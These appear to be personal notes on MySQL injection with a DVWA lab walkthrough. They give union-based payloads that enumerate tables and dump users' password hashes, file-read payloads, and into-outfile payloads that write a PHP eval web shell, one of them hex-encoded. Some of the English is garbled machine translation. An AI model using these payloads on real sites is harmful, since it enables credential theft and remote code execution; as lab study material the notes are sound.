[Summary] Vulnerability SQL Injection Vulnerability

---

Date: 2019-07-23 19:55:59
update:
Author: Bay0net
Description: Mysql injection notes

---

0x01, basic information

Basic terms

• Database: The database is a collection of related tables.
• Data: Table are matrix data. In a database table it looks like a simple spreadsheet.
• Column: one (data element) contain the same type of data, such as a zip code.
• Rows: one (= tuple or record) is a group of related data, such as a user subscription data.
• Primary key: Primary key is unique. A data table can contain only one primary key. You can use the primary key to query the data.
• Foreign Key: foreign key for associating the two tables. 

Common Commands

# 登录
mysql -h 127.0.0.1 -u root -p root

0x02, Mysql command

Explosion database name, table names, field names

In each MySQLinstance has a separate information_schema, used to store MySQLall of the basic information of other database instances.

# 爆数据库的名称
select group_concat(SCHEMA_NAME) from information_schema.schemata;

# 爆当前数据库的表名
select group_concat(table_name) from information_schema.tables where table_schema=database();

# 爆字段名(表名是 users，加引号或十六进制编码)
select group_concat(column_name) from information_schema.columns where table_name='users';
select group_concat(column_name) from information_schema.columns where table_name=0x7573657273;

# 爆字段内容
select first_name,password from users

View MySQL read and write permissions

Use mysqlof the read and write functions need to have certain privileges.

secure_file_privParameters used to restrict load_file,into outfileother related functions to perform the role of literacy in which the specified directory.

# 查看方式
show global variables like '%secure%';

# 具体意义
当 secure_file_priv 的值为 null ，表示限制 mysqld 不允许导入|导出
当 secure_file_priv 的值为/tmp/ ，表示限制 mysqld 的导入|导出只能发生在/tmp/目录下
当 secure_file_priv 的值为/，表示限制 mysqld 的导入|导出的目录为所在的整个磁盘
当 secure_file_priv 的值没有具体值时，表示不对 mysqld 的导入|导出做限制

File Operations

# 读取文件
select load_file('//tmp//key');

# 写入文件（需要有权限、知道绝对路径）
select 'hello' into outfile '/tmp/test01'

Filter function

PHP < 5.4Time; there is a magic_quotes_gpcconfiguration item, when magic_quotes is onall 单引号、双引号、反斜杠和 nullare automatically escaped with a backslash. In php5.4later versions you can not use this method to escape.

mysql_real_escape_string(), It is also used to escape special characters, but this extension php5.5has been deprecated in, and php7deletion.

PHP: mysqli::real_escape_string - Manual

0x03、SQL Injection（DVWA）

Low Security Level

# 判断是否为注入
?id=1' or '1'='1
?id=1' or '1'='2

# 判断字段长度（2 正常，3 异常）
?id=1' order by 2 -- 
?id=1' order by 3 --

# 确定回显点
?id=1' union select 111,222 -- 

# 用户名和数据库名称
?id=1' union select user(),database() -- 
-- output：admin@localhost、dvwa

# 查看当前用户和 mysql 版本
?id=1' union select current_user(),version() -- 
-- output：First name: admin@%、 5.5.47-0ubuntu0.14.04.1

# 爆表名
?id=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema =database() -- 
-- output：guestbook,users

# 爆列名（两种办法，加引号或者十六进制编码）
?id=1' union select 1,group_concat(column_name) from information_schema.columns where table_name =0x7573657273 -- 
?id=1' union select 1,group_concat(column_name) from information_schema.columns where table_name ='users' -- 
-- output：user_id,first_name,last_name,user,password,avatar,last_login,failed_login

# 爆字段名
?id=1' union select group_concat(user_id,first_name,last_name),group_concat(password) from users  -- 
?id=1' union select null,concat_ws(char(32,58,32),user,password) from users -- 
?id=1' union select user,password from users -- 
-- output：admin/5f4dcc3b5aa765d61d8327deb882cf99

# 读文件
?id=1' union select 1,load_file('//tmp//key') -- 

# 写文件()
?id=1' and '1'='2' union select null,'hello' into outfile '/tmp/test01' --
?id=999' union select null,'hello' into outfile '/tmp/test02' --
?id=999'  union select null,'<?php @eval($_POST["gg"]); ?>' into outfile '/tmp/test03' --  
?id=999' union select 1,0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E into outfile '//tmp//test04' -- 

Medium Security Level

Use a mysqli_real_escape_stringfunction to escape special characters, while the front page set up drop-down selection form, hoping to control the user's input.

Here is a digital-type implant, so little relationship between the filter and special symbols, using the hackbarconduct POSTcan be.

# 判断注入点
id=1 and 1=1 &Submit=Submit
id=1 and 1=2 &Submit=Submit

# 爆数据
id=1 union select user,password from users&Submit=Submit

High Secuirty Level

Here added a limit 1limiting output, but may be directly commented, solution and Low Security Levelthe same.

Impossible Secuity Level

Using PDOtechnology to draw a line of code and data, effectively prevent SQL injection, while the number of query results returned only for the moment, will succeed output, thus effectively prevent the "Tuoku" Anti-CSRFtokenmechanism added to further improve the safety.

DVWA SQL Injection clearance Tutorials | AnCoLin's Blog | wind shadow blog